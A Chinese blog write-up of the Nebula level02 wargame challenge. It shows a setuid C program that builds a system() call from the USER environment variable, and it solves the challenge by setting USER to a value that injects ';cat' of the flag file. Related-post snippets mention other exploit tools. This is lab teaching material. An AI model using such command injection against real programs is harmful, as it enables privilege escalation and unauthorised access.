i春秋 - Exploit-Exercises: Nebula - level02

最新推荐文章于 2021-07-07 08:32:24 发布
最新推荐文章于 2021-07-07 08:32:24 发布
阅读量1.1k 收藏
点赞数
分类专栏: exploit 文章标签: exploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SCNU_Jiechao/article/details/57129084
版权

About

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

Source code

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  char *buffer;

  gid_t gid;
  uid_t uid;

  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  buffer = NULL;

  asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
  printf("about to call system(\"%s\")\n", buffer);

  system(buffer);
}

Nebula官网

程序逻辑

输出环境变量USER很cool

思路

覆盖环境变量USER

USER=";cat /home/flag02/flag"
/home/flag02/flag02

flag

jchalex
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Exploit-Exercises Nebula全攻略——Linux平台下的漏洞分析入门
04-25
Exploit-Exercises Nebula全攻略——Linux平台下的漏洞分析入门
Nebula level02
无心插柳
11-08 6207
There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it? To do this level, log in as the level02 account with the password level02 . Files for t
i春秋 - Exploit-Exercises: Nebula - level00
无节操
02-25 2410
AboutThis level requires you to find a Set User ID program that will run as the “flag00” account. You could also find this by carefully looking in top level directories in / for suspicious looking dire
i春秋 - Exploit-Exercises: Nebula - level01
无节操
02-25 2536
AboutThere is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?To do this level, log in as the level01 account with the password level01. Files for th
Nebula_level02
yuansunxue的专栏
01-29 311
exploit-exercises Nebula: level02 In level02 Nebula challenge, we have the following source code #include #include #include #include #include int main(int argc, char **argv, ch
linux-exploit-suggester:Linux特权升级审核工具
04-22
LES:Linux特权升级审核工具快速下载: wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh有关LES用法和内部工作方式的详细信息: ...
CMS-Exploit-Framework:CMS 漏洞利用框架
07-10
chu@sh3ll-me:/tmp » git clone https://github.com/chuhades/CMS-Exploit-Framework.gitCloning into 'CMS-Exploit-Framework'...remote: Counting objects: 352, done.remote: Compressing objects: 100% (182/...
jndi-JNDI-Injection-Exploit
12-27
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] 其中: -C - 远程class文件中要执行的命令。 (可选项 , 默认命令是mac下打开计算器,即"open /Applications/Calculator....
google-translate-exploit:Google翻译翻译漏洞
02-03
5. **压缩包子文件的文件名称列表:"google-translate-exploit-master"**:这可能是一个项目或代码库的主分支名,其中包含了利用Google翻译漏洞的相关代码、文档或测试用例。"master"通常表示这是源代码仓库的默认或...
awesome-vm-exploit:分享有关vm和qemuscape漏洞利用的一些有用档案
02-02
在"awesome-vm-exploit-master"目录下,你可能会找到以下几类资源: 1. **漏洞报告**:这些报告详细介绍了已知的安全漏洞,包括漏洞的成因、影响范围以及如何利用。通过阅读这些报告,你可以了解过去的安全问题,...
ExploitExercises_Nebula_Level02
小黑话不多
12-26 444
题目源代码: #include #include #include #include #include int main(int argc, char **argv, char **envp) { char *buffer; gid_t gid; uid_t uid; gid = getegid(); uid = geteuid(); setresgid
i春秋 - Exploit-Exercises: Nebula(1)
大博的博客
04-29 1508
还是老哥的锅,兴冲冲的给我说这个比赛很有意思,一脸懵逼的进来,但是绝对不会一脸懵逼的出去。这个对于我这个才是WEB方面的小白的我来说有点懵逼,最后百度了百度还是懂了一点。那就写下我做这个题的想法。nebula其实就是专门针对linux提权训练的一个靶机,就这个我需要理解很多知识顺便补充了一个find命令(这个find命令补充还是在我的博客里)find / -user flag00 -perm -4...
exploit-exercises.com/fusion/level02/
sinat_16584757的博客
01-29 416
题目: https://exploit-exercises.com/fusion/level02/ 参考: CTF PWN绕过 ASLR 和 NX 的三种利用方式(http://mp.weixin.qq.com/s/6FptDuyOSp83t-B1y4SooQ) 工具:  Kali Linux, pwntool,  gdb, peda       这是第一次玩 pwn,几乎全程安照参
i春秋 - Exploit-Exercises: Nebula - level03
无节操
02-25 1918
AboutCheck the home directory of flag03 and take note of the files there.There is a crontab that is called every couple of minutes.思路先进flag文件夹看看cd /home/flag03 vim writable.sh#!/bin/shfor i in /home/fl
Nebula: level06
yuansunxue的专栏
02-08 290
exploit-exercises Nebula: level06 In level06, we are told that the account credentials for flag06 user account come from a legacy unix system. Let's go straight to the bank. level06@nebula:~$
i春秋 - Exploit-Exercises: Nebula - level06
无节操
02-25 1173
AboutThe flag06 account credentials came from a legacy unix system. Nebula思路题目提示“legacy unix system”,即可破用户密码。cat /etc/passwd | grep flag06得到 sudo apt install john vim flag06passflag06:ueqwOCnSGdsuM:9
XSS靶场level15详细通关教程
m0_49434302的博客
07-07 1739
我的一个朋友这些天在家找工作,利用间隙时间重温一下XSS靶场。可是做到第15关的时候,怎么也无法通关。我这个朋友在15关卡住了2天。最后终于找到了问题的根源。【这个朋友使用的是在线靶场,如果你是自己搭建的靶场不会遇到我的问题,只需阅读前半部分即可。】 第一步:查看源码 注意到了一个新朋友:ng-include。 ng-include 指令用于包含外部的HTML文件。包含的内容将作为指定元素的子节点。ng-include属性的值可以是一个表达式,返回一个文件名。默认情况下,包含的文件需要包含在同一域
Nebula level07
无心插柳
05-10 7741
The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server. To do this level, log in as the level07 account with the p
nebula 01
weicz的专栏
08-20 542
这一关是找出一个程序可以执行任意程序的漏洞 1#include 2#include 3#include 4#include 5#include 6 7int main(int argc, char **argv, char **envp) 8{ 9 gid_t gid; 10 uid_t uid; 11 gid = getegid(); 12 uid =
linux-exploit-suggester2
最新发布
07-28
你好,感谢你的提问!针对 Linux 系统的漏洞利用建议工具有很多,其中一个常用的工具是 Linux-exploit-suggester 2。它是一个能够检测 Linux 系统中已知漏洞的脚本,以帮助系统管理员评估系统安全性并提供潜在的漏洞利用建议。 该工具可以通过分析运行中的 Linux 内核版本和已加载的模块来确定可能存在的漏洞利用。它会与 CVE(通用漏洞和暴露)数据库进行比对,找出可能适用于当前系统的已知漏洞。 要使用 Linux-exploit-suggester 2,你需要将该脚本下载到你的 Linux 系统上,并运行它来获取漏洞利用建议。请注意,这个工具只能检测已知的漏洞,因此及时更新和修补系统是保持系统安全性的重要步骤。 希望这个回答能够帮到你!如果你有任何其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值